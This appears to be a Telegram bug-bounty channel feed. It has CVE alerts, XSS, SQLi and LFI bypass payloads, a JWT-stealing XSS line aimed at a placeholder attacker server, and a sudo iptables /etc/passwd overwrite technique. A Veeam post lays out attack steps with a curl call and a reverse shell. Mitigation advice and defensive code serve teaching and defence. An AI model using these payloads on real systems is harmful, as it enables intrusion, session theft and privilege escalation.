CyberSec Playground | Learn ethical hacking ⚡️
745 subscribers
73 photos
1 video
2 files
188 links
Welcome to CyberSec Playground! A community to learn, explore, and master penetration testing and bug bounty, ethical hacking, and all things cybersecurity.
Backup : https://t.me/fatherofbits
cybersecplayground.com
#BugBounty #Hacking
🚨 Critical Vulnerability Alert: Fortinet FortiOS Authentication Bypass (CVE-2024-55591) 🚨

**Overview:**
A significant security flaw has been identified in Fortinet's FortiOS and FortiProxy systems, allowing remote attackers to gain super-admin privileges without proper authentication. This vulnerability is actively being exploited in the wild. ([FortiGuard](https://www.fortiguard.com/psirt/FG-IR-24-535))


**Technical Details:**
- **Vulnerability ID:** CVE-2024-55591
- **Affected Products:**

- FortiOS versions 7.0.0 through 7.0.16
- FortiProxy versions 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12


**Impact:**
Allows attackers to gain super-admin privileges via crafted requests to the Node.js websocket module of the web management interface, so the precondition is that the administrative HTTP/HTTPS interface is reachable by the attacker. ([NVD](https://nvd.nist.gov/vuln/detail/cve-2024-55591))


**Proof of Concept:**
A proof-of-concept (PoC) exploit has been released by watchTowr Labs, demonstrating how this vulnerability can be leveraged to execute commands with super-admin privileges. The PoC is available on GitHub: [GitHub](https://github.com/watchtowrlabs/fortios-auth-bypass-poc-CVE-2024-55591)


**Mitigation:**
Fortinet published fixed builds together with the advisory: upgrade FortiOS 7.0.x to 7.0.17 or later, FortiProxy 7.0.x to 7.0.20 or later, and FortiProxy 7.2.x to 7.2.13 or later. Until the upgrade is done, disable the HTTP/HTTPS administrative interface or restrict it to trusted addresses with local-in policies, and check the indicators of compromise in FG-IR-24-535: the advisory lists the log entries and attacker-created admin accounts observed in the exploitation campaign, so a patch without that review can leave an existing backdoor account in place.
quick Linux tip 💡

In Linux, you can use the pgrep command to find the PID(s) of a process by name. The name is treated as an extended regular expression and, by default, is matched against the process name only.

$ pgrep name

Use pgrep -f name to match against the full command line instead, and pgrep -a name to print each matching command line next to its PID. pidof does a similar job, but it only takes exact program names and doesn't support pattern matching.


follow us for more great tips! 🐧😎

#cybersecurity #BugBounty #bugbountytips #linuxtips
🌟 bugbountytip

🌟 403 Successful bypass

🌟 Add ../ between two UUIDs in the path and see whether the 403 turns into a 200. It works when the access rule (proxy, WAF, gateway) is applied to the raw path while the backend normalizes the ../ away, so the two layers see different resources. If the plain form is blocked, try encoded variants of the same idea.


#BugBounty #bugbountytips #BugHunter #bug #web2 #web3 #ethicalhacking
🚨 XSS Payload : Stealing JWT from Local Storage 🚨

A malicious XSS payload can be used to extract JSON Web Tokens (JWTs) stored in localStorage and send them to an attacker-controlled server. Here's a simple yet dangerous example:



<img src='https://<attacker-server>/yikes?jwt='+JSON.stringify(localStorage);'--!>


🛠 How It Works:
This payload injects an <img> tag whose src points at the attacker's server.
The intent is to append JSON.stringify(localStorage) (which may contain JWTs or other sensitive data) to the query string, so the image request carries it into the attacker's access log.
Note that the + JSON.stringify(localStorage) part is JavaScript, not HTML: it only executes when the payload lands in a JavaScript context (for example a string the page later concatenates into the DOM). Injected into plain HTML, the same idea needs an event handler such as onerror to run the JavaScript that builds the request.


🔥 Why Is This Dangerous?
Attackers can hijack sessions and gain unauthorized access.
Sensitive tokens (JWT, API keys) can be stolen and misused.
If exploited on an admin panel, attackers might escalate privileges.


🛡 How to Prevent It?
✔️ Use HTTP-Only Cookies: Store session tokens in cookies with the HttpOnly, Secure and SameSite attributes so scripts cannot read them. This stops the token from being exfiltrated, not the XSS itself: injected script can still make authenticated requests from the victim's browser, so fixing the injection remains mandatory.

✔️ Implement CSP (Content Security Policy): Restrict inline scripts and unauthorized domains.

✔️ Sanitize User Input: Use libraries like DOMPurify to prevent injecting malicious HTML.

✔️ Validate & Escape Data Properly: Ensure user inputs are validated before rendering.
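Detection side, as an added example that is not part of the post: a scanner over access-log lines (constructed here, in Common Log Format) that percent-decodes each request target and flags tokens shaped like a JWT whose header decodes to JSON with an alg claim. Run it over your own edge logs to find sessions whose tokens have already been put into a URL, whether by this payload or by a developer's debug code; the host names and tokens below are made up.

```python
import base64
import json
import re
from urllib.parse import unquote

# JWT shape: three base64url segments; the header segment starts with "eyJ" ('{"')
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*")

# Common Log Format: client ident user [time] "METHOD target PROTO" status size ...
CLF_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def _b64url_json(segment):
    """Decode one base64url segment as JSON, or return None if it is not one."""
    segment += "=" * (-len(segment) % 4)
    try:
        return json.loads(base64.urlsafe_b64decode(segment))
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def find_jwts(text):
    """Return every JWT-looking token in text whose header is a JSON object with 'alg'."""
    tokens = []
    for match in JWT_RE.finditer(text):
        header = _b64url_json(match.group(0).split(".")[0])
        if isinstance(header, dict) and "alg" in header:
            tokens.append(match.group(0))
    return tokens


def scan_access_log(lines):
    """Flag requests whose URL carries a JWT, after percent-decoding the target."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue
        # JSON.stringify(localStorage) in a query string arrives percent-encoded
        target = unquote(m.group("target"))
        tokens = find_jwts(target)
        if tokens:
            hits.append({"client": m.group("client"), "target": target, "tokens": tokens})
    return hits


# Constructed sample log lines (not real traffic). The first one is what the
# payload above produces once the attacker's server logs the image request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2025:12:00:01 +0000] "GET /yikes?jwt=%7B%22access_token%22%3A%22'
    'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI0MiJ9.sig%22%7D HTTP/1.1" 404 0 '
    '"https://app.example.com/" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Feb/2025:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # base64url JSON without an "alg" claim: looks like a token but is not flagged
    '198.51.100.9 - - [10/Feb/2025:12:00:03 +0000] "GET /img?id=eyJub3QiOiJqd3QifQ.abc.def HTTP/1.1" 200 128 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["client"], hit["target"], hit["tokens"])
```

The header check keeps the noise down: plenty of base64url values start with eyJ, but only a real JWT header decodes to a JSON object carrying alg. Anything flagged should be treated as a compromised session and revoked, not just logged.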


🚀 Stay Secure 🔐

#CyberSecurity #XSS #WebSecurity #EthicalHacking #BugBounty #JWT #PenTesting #InfoSec
🧨 Reflected XSS (RXSS) Payload Alert! 🧨

Reflected XSS (RXSS) vulnerabilities allow attackers to inject and execute malicious scripts by crafting special payloads. Here's a custom payload that triggers a prompt pop-up when injected into a vulnerable web application

💣 Custom Payload:
"></a></td></tr></table><script>prompt('ijustcopypastelikeanoob');</script></html>//


🔥 How It Works:
- Breaks out of HTML structure using "></a></td></tr></table>.

- Injects a <script> tag that executes JavaScript.

- Triggers a prompt function, confirming code execution.


⚠️ Potential Dangers:
Can be modified to steal cookies, localStorage, or session tokens.
Attackers can perform actions on behalf of users (CSRF-like behavior).
Could be used to deface websites, spread malware, or execute phishing attacks.


🛡 How to Prevent RXSS?
✔️ Encode Output for Its Context: Encode <, >, ", ' and & according to where the value lands (HTML body, attribute, JavaScript string, URL). Stripping characters is not enough, and the encoding that is right for one context is wrong for another.

✔️ Use CSP (Content Security Policy): Restrict inline scripts and only allow trusted domains.

✔️ Validate Input on Server & Client Side: Never trust user-generated data.

✔️ Use Security Libraries: Implement DOMPurify or similar libraries to filter untrusted input.


🚀 Stay Safe ! 🔐

#CyberSecurity #RXSS #XSS #WebSecurity #BugBounty #EthicalHacking #InfoSec #PenTesting
🚀 Exploring Privilege Escalation via sudo iptables 🚀

In a recent blog post, Shielder's researchers describe two techniques by which a low-privileged user who is allowed to run iptables and iptables-save via sudo can escalate to root.


Key Takeaways

Injecting Fake /etc/passwd Entries:
iptables accepts arbitrary text in a rule comment (-m comment --comment), and iptables-save -f writes the whole ruleset, comments included, to a file path of the attacker's choosing as root. Putting a crafted passwd line (a UID 0 account with a known password hash) in a comment and then writing the ruleset over /etc/passwd with iptables-save -f /etc/passwd creates a new root-level account. The write replaces the original file contents, so this is a destructive technique: keep a copy of /etc/passwd before trying it.


Exploiting Missing Kernel Modules:
iptables has a --modprobe=<program> option that names the program to run when a required kernel module is not loaded. If the target system lacks a module that a rule needs, an attacker who can run iptables with sudo can point --modprobe at an arbitrary program, which is then executed as root. The method only works when the required module is genuinely absent or unloaded.
These findings underscore the importance of carefully managing sudo permissions and ensuring that only trusted users have access to powerful system utilities like iptables. Administrators are advised to review their sudoers configurations, including seemingly harmless entries for iptables-save, and restrict access to such commands to mitigate potential security risks.


For a detailed walkthrough of these techniques, check out the full article: A Journey From sudo iptables To Local Privilege Escalation

🔗 https://www.shielder.com

#CyberSecurity #PrivilegeEscalation #LinuxSecurity #EthicalHacking #InfoSec #PenTesting
🛡 Exclusive AWS WAF Bypass – Works on All Tags (Even <meta>)! 🔥

💡 Bypassing AWS Web Application Firewall (WAF)
using a unique payload that executes JavaScript onmouseover, even in restricted tags like <meta> (but not <input type="hidden">).

🔹 Payload:
<xhzeem attr="--- x="=='='onmouseover=confirm`xhzeem` style="display:block;width:1000px;height:1000px;background:red"> --- ">


⚡️ How It Works:
Uses a *custom HTML tag (`<xhzeem>`) to bypass WAF detection.*
Encapsulates the payload in an *unusual attribute structure.*
The *`onmouseover=confirm('xhzeem')`* triggers when hovered over.
Works on *various HTML tags* (even `<meta>`, `<div>`, `<span>`), making it a powerful *XSS attack vector.*


🚨 Why Is This Dangerous?
🔻 Can be used for *session hijacking, cookie theft, or phishing.*
🔻 AWS WAF may fail to detect this due to *non-standard attribute structures* and the unknown tag name.
🔻 It bypasses *pattern-based WAF and XSS filters*; it does not bypass a CSP that forbids inline event handlers, which is why CSP is listed under mitigation and the WAF is not a substitute for it.


🛡 Mitigation Steps:
✔️ Use a strict Content Security Policy (CSP).
✔️ Implement proper input sanitization.
✔️ Don't rely solely on AWS WAF for XSS protection!
✔️ Perform security testing using advanced payloads like this!


🚀 Stay Secure & Test Your WAF Rules!

#CyberSecurity #AWS #WAFBypass #XSS #WebSecurity #BugBounty #EthicalHacking #PenTesting #InfoSec
🔥 Bypassing Security Filters Using Base64 Encoding 🔥

💡 Why didn't we use plain /etc/passwd?
When trying to access sensitive files directly via Local File Inclusion (LFI), the server often detects known patterns (e.g., /etc/passwd) and blocks them with a 403 Forbidden response. However, many filters don’t decode Base64-encoded payloads, allowing us to bypass restrictions.

🚀 Example: Bypassing LFI Restrictions

Blocked Attempt:
url/?f=/etc/passwd  ==> 403 (Forbidden)


🔻 The server has a security mechanism in place to detect and block direct access to sensitive files.

Bypassing with Base64 Encoding:

First, encode /etc/passwd into Base64:

echo -n "/etc/passwd" | base64

🔹 Output: L2V0Yy9wYXNzd2Q=

Then, send the request with the encoded payload:

url/?f=L2V0Yy9wYXNzd2Q=  ==> 200 (Success)


🔹 If the server automatically decodes Base64 before processing the request, it may serve the /etc/passwd file without triggering security filters.

📌 Where Can This Trick Be Used?

🔹 SQL Injection (SQLi):

Some WAFs block ' or -- in queries. By encoding or double-encoding the payload, you can bypass detection.

🔹 Server-Side Template Injection (SSTI):

Some template engines expose Base64 decoding as a filter or helper, so a payload the WAF does not recognise in encoded form can still be decoded and evaluated by the engine itself.

🔹 Cross-Site Scripting (XSS):

Some WAFs block <script>. By encoding it, you may bypass the filter and execute the script.

<img src="data:image/svg+xml;base64,PHNjcmlwdD5hbGVydCgneHhzJyk8L3NjcmlwdD4=">

(Decodes to <script>alert('xxs')</script> inside an SVG. Caveat: browsers do not run scripts in SVG loaded through <img>, so this exact tag will not pop an alert; the same data: URI does execute when the SVG is loaded as a document, e.g. through <object>, <iframe> or direct navigation, subject to CSP.)

🔹 Local File Inclusion (LFI):

As shown above, encoding file paths can trick the server into allowing
access.

🔹 Remote File Inclusion (RFI):

In PHP with allow_url_include enabled, the data:// stream wrapper lets you supply the included content inline and Base64-encoded (data://text/plain;base64,...), turning an include into code execution even when remote hosts are blocked.

🛡 Mitigation Techniques
🔹 Disable automatic Base64 decoding in web applications.
🔹 Use allowlists instead of blocklists for filtering inputs.
🔹 Enforce strict input validation to reject encoded malicious payloads.
🔹 Monitor logs for unusual Base64 patterns that could indicate an attack.
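An added example (not from the post) of the filter mismatch described above, in Python: a blocklist applied to the raw parameter, a framework-style transparent Base64 decode that runs afterwards, and a resolver that decodes first, canonicalises, and only then checks that the result stays under the document root. The root path and file names are assumed for the demo.

```python
import base64
import binascii
import os

DOCUMENT_ROOT = "/var/www/app/public"       # assumed: where the ?f= files live
BLOCKLIST = ("/etc/passwd", "../", "..\\")  # the pattern filter the post describes


def maybe_base64_decode(value):
    """Mimic a framework that transparently decodes Base64-looking parameters.

    Auto-decoding is itself the design smell: any short value made of base64
    characters gets silently rewritten before the application ever sees it."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return value


def vulnerable_resolve(f):
    """Blocklist checked on the raw value; decoding happens afterwards (the bypass)."""
    if any(bad in f for bad in BLOCKLIST):
        return "403"
    return maybe_base64_decode(f)  # the path the server would go on to open


def hardened_resolve(f, root=DOCUMENT_ROOT):
    """Decode first, canonicalise, then allow only paths that stay under root."""
    decoded = maybe_base64_decode(f)
    if "\x00" in decoded:  # null bytes truncate paths in some runtimes
        return None
    # os.path.join drops root entirely when decoded is absolute, which is
    # exactly the /etc/passwd case; normpath also collapses any ../ segments.
    candidate = os.path.normpath(os.path.join(root, decoded))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for param in ("/etc/passwd", "L2V0Yy9wYXNzd2Q=", "../../etc/passwd", "readme.txt"):
        print(param, "->", vulnerable_resolve(param), "|", hardened_resolve(param))
```

The hardened resolver is an allowlist by construction: it does not try to enumerate bad strings, it computes where the request would actually land and rejects anything outside the directory it is allowed to serve from. A fixed allowlist of file names is stronger still where the set of files is known.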

🔥 Takeaway for Bug Bounty Hunters & Pentesters
Encoding payloads in Base64, double Base64, or URL encoding can help bypass WAFs and security filters.
Always check if the server decodes Base64 before processing input—this can be a goldmine for exploitation.
Combine encoding with other techniques (e.g., double encoding, path traversal, null-byte injection) for better results!

🚀 Stay Curious, Keep Hacking!

#BugBounty #Pentesting #CyberSecurity #EthicalHacking #LFI #XSS #SQLi #SSTI #InfoSec #WAFBypass
🚀 OAuth Logout URL XSS Exploit (CVE-2023-24488) - POC 🚀

💡 Vulnerability: Cross-Site Scripting (XSS) via post_logout_redirect_uri in OAuth endpoint.

💀 Impact: Allows stealing cookies, session hijacking, or phishing attacks on OAuth-based apps.

🔥 POC Payload:

oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E


✔️ What Happens?
The application fails to properly sanitize the post_logout_redirect_uri parameter, allowing injection of line breaks (%0d%0a) and JavaScript execution (<script>alert(document.cookie)</script>).


✔️ Why Is This Dangerous?
Can steal session cookies (if HttpOnly is not enabled).
Phishing attacks by injecting fake login pages.
Account takeover risk if chained with other OAuth flaws.


🛡 How to Prevent It?
✔️ Sanitize and validate redirect URLs (allow only whitelisted domains).
✔️ Encode user input properly to prevent JavaScript execution.
✔️ Enable Content Security Policy (CSP) to block inline scripts.
✔️ Use HttpOnly & Secure cookies to protect sensitive session data.
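An added example, not Citrix code or the post's own: a redirect handler that concatenates the decoded parameter into the Location header (which is how CR/LF in the value ends the headers and starts an attacker-controlled body), next to a validator that rejects control characters and accepts only an exact registered URI. The registration set and host names are assumed for the demo.

```python
from urllib.parse import unquote, urlsplit

# Hypothetical exact-match registrations for one OAuth client (not from the post)
REGISTERED_LOGOUT_URIS = {
    "https://app.example.com/logged-out",
}

# The payload quoted in the post, as it arrives on the wire
PAGE_PAYLOAD = "%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E"


def logout_response_vulnerable(raw_param):
    """Builds the raw HTTP redirect by string concatenation. The decoded value
    lands in the Location header, so a CRLF CRLF inside it terminates the
    header block and everything after it is served as the response body."""
    return (
        "HTTP/1.1 302 Found\r\n"
        "Location: " + unquote(raw_param) + "\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )


def validate_post_logout_redirect_uri(raw_param):
    """Return the registered URI to redirect to, or None (fall back to a default page)."""
    value = unquote(raw_param)
    # Reject control characters before anything else: CR/LF is header
    # injection, and urlsplit would silently strip some of them.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        return None
    parts = urlsplit(value)
    # https only, a host must be present, and no userinfo tricks like host@evil
    if parts.scheme != "https" or not parts.netloc or "@" in parts.netloc:
        return None
    # Exact comparison of scheme+host+path against the client's registration:
    # no prefix or suffix matching, query and fragment are not part of the key.
    normalized = parts._replace(query="", fragment="").geturl()
    return normalized if normalized in REGISTERED_LOGOUT_URIS else None


if __name__ == "__main__":
    print(repr(logout_response_vulnerable(PAGE_PAYLOAD)))
    for candidate in (PAGE_PAYLOAD,
                      "https://app.example.com/logged-out?state=x",
                      "https://app.example.com.evil.example/logged-out"):
        print(candidate, "->", validate_post_logout_redirect_uri(candidate))
```

Exact matching is the point: allowing "anything under app.example.com" reopens open-redirect and lookalike-host cases, while a fixed set of registered URIs makes the parameter a selector rather than an input.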


🕵️‍♂️ Bug Bounty Tip:
🔹 Always check OAuth redirect parameters for XSS & open redirect issues!
🔹 Test post_logout_redirect_uri, redirect_uri, and similar params.
🔹 Try encoding tricks like double URL encoding, newline injection, and HTML entity encoding.


🔗 Stay ahead in bug bounty hunting & penetration testing! 🚀
🚀 Join us for daily tips and more bbh learning 🚀

#InfoSec #CyberSec #BugBountyTips #XSS #OAuth #WebSecurity #EthicalHacking #AppSec #PenTesting
🚨 Critical RCE in the Veeam Updater – CVE-2025-23114 (CVSS 9.0) 🚨

🔴 What’s Happening?
A critical vulnerability in the Veeam Updater component lets an attacker in a man-in-the-middle position execute arbitrary code on the affected backup appliance. Per Veeam KB4712 the affected products are Veeam Backup for Salesforce, Veeam Backup for Nutanix AHV, Veeam Backup for AWS, Veeam Backup for Microsoft Azure, Veeam Backup for Google Cloud, and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization. Veeam Backup & Replication deployments that do not manage one of those appliances are not affected.


🔥 How Attackers Exploit CVE-2025-23114?
🔹 On-path position: the attacker must be able to intercept the appliance's Updater traffic (a compromised network segment, DNS or proxy), not merely reach the appliance over the internet.
🔹 Malicious update response: the Updater's check is answered with attacker-controlled content, which results in code execution on the appliance.
🔹 Post-exploitation: with code running on a backup appliance, attackers can pivot into the protected environment and tamper with or exfiltrate backups.
The "exposed service, default credentials, crafted request" chain does not apply to this CVE; exposure matters for inventory, not as the attack path.


📍 OSINT Query (Hunter):
product.name="Veeam Backup"


🔗 Check Exposed Instances:
➡️ https://hunter.how/list...
Use the result set for inventory only: it is an upper bound, since the query does not distinguish the affected appliance products from Backup & Replication.

🛡 How to Protect Against CVE-2025-23114?
Patch Immediately: Install the fixed Veeam Updater component version listed in KB4712 on every affected appliance.
Restrict Access: Limit the appliance's network exposure to trusted IPs, and make sure its update traffic does not traverse untrusted networks or proxies.
Disable Unused Services: Close unnecessary ports to minimize attack surface.
Enable MFA & Strong Passwords: General hygiene; credential attacks are not part of this CVE.
Monitor Logs & Alerts: Look for unexpected Updater activity or new processes on the appliance.


📌 Official Patch & Advisory:
🔹 Veeam KB4712

🕵️ Exploitation & Proof-of-Concept (PoC)

No public PoC for CVE-2025-23114 is cited here. The steps below are a generic assessment workflow; the credentials and request in steps 2 and 3 are placeholders, not documented Veeam defaults or endpoints.

🚨 Steps to Attack (For Research Purposes Only!):

1️⃣ Identify Targets

Use Hunter OSINT or tools like shodan.io to find exposed Veeam servers.
Query:
product.name="Veeam Backup"


2️⃣ Check for Weak Credentials

Username: Administrator  
Password: Veeam#123


🔍 Placeholder pair for weak or reused password testing; Veeam appliances do not ship with this as a default, and valid credentials are not needed for the MitM path of this CVE.

3️⃣ Exploit the RCE Vulnerability

⚡️ Illustrative request only: there is no /api/v1/exploit endpoint, and port 9398 is the Veeam Backup Enterprise Manager REST API port, not the Updater. The real trigger is a malicious response to the Updater's check, delivered from an on-path position.

curl -X POST "http://target-ip:9398/api/v1/exploit" -d "cmd=whoami"


4️⃣ Gain Shell Access

If successful, deploy a reverse shell and escalate privileges.
📰 Read More:
🔹 SecurityOnline Info
🔹 The Hacker News

━━━━━━━━━━━━━━━━━━
⚠️ Conclusion:
This is a critical vulnerability in the updater of several Veeam backup appliances. An on-path attacker can execute code on the appliance and from there reach the backup data. Patch per KB4712 and harden the appliance's network path!

Join us for more daily hacking news and bbh learning

#VEEAM #HunterHow #CyberSecurity #OSINT #BugBounty #Pentesting #RCE #Exploit #Infosec #EthicalHacking
🚨 CVE-2024-21413 – Microsoft Outlook RCE Vulnerability 🚨

🔴 Critical Remote Code Execution (RCE) in Microsoft Outlook!
CVE-2024-21413 (patched in the February 2024 Patch Tuesday, named "MonikerLink" by Check Point Research) lets attackers bypass Outlook's Protected View and Office security warnings through specially crafted hyperlinks.


🕵️ How Attackers Exploit It?
🔹 Weaponized Links: A file:// hyperlink to an attacker-controlled share with a "!" appended to the path is treated as a moniker rather than a plain file link. Outlook resolves it, which leaks the user's NTLM credentials to the attacker's server, and the referenced Office document is opened without Protected View, which is the path to code execution.
🔹 Low Interaction: Microsoft lists the Preview Pane as an attack vector, although the public PoC relies on the user clicking the link.
🔹 Remote Code Execution: If successful, attackers gain control of the system.


🔥 PoC Released
💻 GitHub PoC: CVE-2024-21413 Exploit

🔗Hunter Link:https://hunter.how...

🔍 Query

🔎 HUNTER :
product.name="Outlook Web App"

🔎 FOFA :
product="Microsoft-Outlook"

🔎 SHODAN :
http.component:"Outlook Web App"

⚠️ These queries find exposed Outlook Web App / Exchange front ends, which are not the vulnerable component: CVE-2024-21413 is a flaw in the Outlook desktop client. At best the hit list indicates organisations that use Outlook, not vulnerable systems.


🛡 How to Protect Yourself?
Apply Security Updates: Install Microsoft’s February 2024 (or later) Office and Outlook updates.
Block Outbound SMB: The malicious link points at an attacker's share, so blocking TCP 445 (and WebDAV) from clients to the internet cuts off the NTLM credential leak.
Use Email Filtering: Block suspicious links and attachments.
Enable Advanced Threat Protection: Monitor and analyze email threats.


📌 Official Microsoft Advisory:

🔗 Microsoft Security Bulletin

⚠️ Don't fall victim to RCE exploits! Stay updated, patch immediately, and enhance your email security.

📢 Join @cybersecplayground for more exploits, PoCs, and cybersecurity insights!

#CVE202421413 #Outlook #RCE #Exploit #CyberSecurity #BugBounty #Infosec #ExploitDevelopment #ZeroClick #Microsoft
🚀 Extract All URLs, SRCs, and HREFs from Any Website!

Want to grab all URLs, src attributes, and href links from a webpage? Just open DevTools (F12) and run this JavaScript snippet in the console!


💻 JavaScript Code:

urls = [];
// $$ is the DevTools console alias for document.querySelectorAll; it does not exist in page scripts
$$('*').forEach(element => {
  urls.push(element.src);
  urls.push(element.href);
});
// Drop undefined/empty values and SVG <a> elements, whose href is an SVGAnimatedString object rather than a string
console.log(...new Set(urls.filter(u => typeof u === 'string' && u)));



🔥 How It Works?
Selects all HTML elements using $$('*'), a DevTools shorthand for document.querySelectorAll.
Reads the src and href properties (DOM elements have no url property); elements without them yield undefined, which the filter drops.
Stores them in an array and removes duplicates with new Set().
Prints all found URLs in the console.


🛠 Use Cases:
🔹 Bug Bounty: Find hidden endpoints, JS files, API calls.
🔹 OSINT: Extract links for reconnaissance.
🔹 Web Scraping: Collect assets from web pages.
🔹 Security Testing: Identify exposed resources.


📢 Stay updated with @cybersecplayground for more infosec tips, bug bounty tricks, and hacking techniques!

#Infosec #CyberSec #BugBounty #OSINT #EthicalHacking #Pentesting #JavaScript
🚀 SQL Injection Payload – Extract Database Version!

💡 Add this SQLi payload to your bug bounty toolkit and use it for database version extraction via CAST-based injection.

🔥 Payload:
%6c%75%33%6b%79%31%33' AND 1=CAST((SELECT version()) AS int) -- 


📌 How It Works?
%6c%75%33%6b%79%31%33 → URL-encoded marker string (lu3ky13); it closes the original value and makes the injection easy to spot in responses and logs, and the encoding may slip past naive filters.
AND 1=CAST((SELECT version()) AS int) -- → Error-based extraction: version() returns a text such as "PostgreSQL 15.4 ...", and casting that to int fails, so a PostgreSQL backend with verbose errors quotes the full version string in the error message. MySQL and SQLite do not raise on this cast, and their error text (or lack of one) is itself a fingerprint.
-- → SQL comment to ignore the rest of the query.

🛠 Use Cases:
🔹 Bypass WAFs with encoding tricks.
🔹 Extract database version for fingerprinting.
🔹 Test for SQLi vulnerabilities in web applications.
🔹 Combine with UNION or Time-Based SQLi for deeper exploitation.
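As an added example (not code from the post), here is the same injection pattern against a constructed in-memory SQLite table, showing why the CAST trick is error-based: the marker string lu3ky13 is just the URL-decoded %6c%75%33%6b%79%31%33, the cast payload surfaces the database's own error text (on PostgreSQL the message quotes the version string; on SQLite it is "no such function: version", which already fingerprints the backend), and the UNION variant returns sqlite_version() directly. The parameterised query beside it is the fix; the table and names are constructed for the demo.

```python
import sqlite3


def connect_demo_db():
    """Constructed in-memory table standing in for the target's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    return conn


def lookup_vulnerable(conn, name):
    """String concatenation: the quote in the payload ends the literal early."""
    sql = "SELECT email FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, name):
    """Parameterised query: the whole payload is treated as a name value."""
    return [row[0] for row in conn.execute("SELECT email FROM users WHERE name = ?", (name,))]


def probe(conn, payload):
    """Run the injected value and report rows or the database error text,
    which is what an error-based payload is fishing for."""
    try:
        return ("rows", lookup_vulnerable(conn, payload))
    except sqlite3.Error as err:
        return ("error", str(err))


# The post's marker string, URL-decoded: %6c%75%33%6b%79%31%33 -> lu3ky13
MARKER = "lu3ky13"
# Error-based probe from the post; on SQLite the error says "no such function: version"
CAST_PAYLOAD = MARKER + "' AND 1=CAST((SELECT version()) AS int) -- "
# UNION variant that returns the version as a normal result row
UNION_PAYLOAD = MARKER + "' UNION SELECT sqlite_version() -- "


if __name__ == "__main__":
    db = connect_demo_db()
    print("cast  :", probe(db, CAST_PAYLOAD))
    print("union :", probe(db, UNION_PAYLOAD))
    print("safe  :", lookup_safe(db, UNION_PAYLOAD))
```

The contrast between probe() and lookup_safe() is the whole lesson: with a bound parameter the payload is compared as a literal name and returns nothing, and no amount of encoding changes that.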


⚠️ Always test in a legal environment and report responsibly!

📢 Stay updated with @cybersecplayground for more bug bounty tricks, SQLi payloads, and hacking techniques!

#SQLInjection #BugBounty #Infosec #CyberSec #Pentesting #EthicalHacking #WAFBypass #OSINT
🚀 Wappalyzer-Next – Advanced Technology Fingerprinting Tool

🔍 Wappalyzer-Next is a powerful technology fingerprinting tool that helps identify web technologies, frameworks, CMS, analytics tools, and more used on any website. It’s an improved version of the classic Wappalyzer, optimized for better performance and accuracy!

🔥 Features:
Detects Web Technologies: CMS, JavaScript libraries, CDNs, analytics, and more.
Faster & More Efficient: Uses optimized detection techniques.
Customizable & Extensible: Modify detection rules as needed.
Built-in CLI & API Support for automation.


💻 Installation & Usage

📌 Install with Python:

git clone https://github.com/s0md3v/wappalyzer-next  
cd wappalyzer-next
pip install -r requirements.txt
python wappalyzer.py -u https://target.com


📌 Example Output:
[+] Detected Technologies:
- Cloudflare (CDN)
- jQuery (JavaScript Library)
- WordPress (CMS)

🔗 GitHub Repo: Wappalyzer-Next

📢 Stay updated with @cybersecplayground for more bug bounty tools, security research, and hacking techniques!

#BugBounty #Recon #CyberSec #OSINT #EthicalHacking #Wappalyzer #Infosec #Pentesting
🚨 Critical RCE in Wazuh Server – CVE-2025-24016 (CVSS 9.9) 🚨

A critical remote code execution (RCE) vulnerability has been disclosed in the Wazuh server, affecting versions 4.4.0 through 4.9.0 and fixed in 4.9.1. The root cause is unsafe deserialization in the server's DistributedAPI (the as_wazuh_object routine that turns JSON parameters back into Python objects), so a crafted API payload leads to arbitrary code execution on the manager.

🔥 Impact:
⚠️ Remote Code Execution (RCE) – Full control over vulnerable servers.
⚠️ Affects Wazuh Versions: 4.4.0 through 4.9.0; upgrade to 4.9.1 or later.
⚠️ Reachability: anyone with access to the Wazuh API, and in some configurations a compromised dashboard or agent.
⚠️ Public Exposure: 17.8K+ Wazuh services are found on Hunter.


🛠 Proof of Concept (PoC):
🔗 GitHub Advisory: PoC & Details

🔍 Finding Vulnerable Instances:
🔗 Hunter Query: Hunter Search

product.name="Wazuh"


🔒 Mitigation & Prevention:
Upgrade to the latest Wazuh version immediately.
Restrict network access to Wazuh Server.
Monitor for unusual activity in Wazuh logs.
Apply WAF rules to block exploit attempts.


📰 References & More Details:
🔗 Security Advisory

📢 Stay updated with @cybersecplayground for more vulnerability insights, bug bounty tricks, and security research!

#hunterhow #infosec #CyberSecurity #OSINT #Vulnerability #BugBounty #Pentesting
🚀 Hacking IIS – Recon & Exploitation Tips

🔍 Popular IIS Endpoints to Check:
📌 /aspnet_client – Default client-script folder; its presence confirms ASP.NET and the subfolder names often leak the framework version.
📌 /trace.axd – ASP.NET trace viewer; if tracing is enabled remotely it exposes request details, headers, cookies and session state.
📌 /global.asax – Application events file; normally not served, but misconfigured handlers or leftover backups of it can reveal app logic.


🎯 Information Disclosure Trick:
💡 Try:

target[.]com/><img>

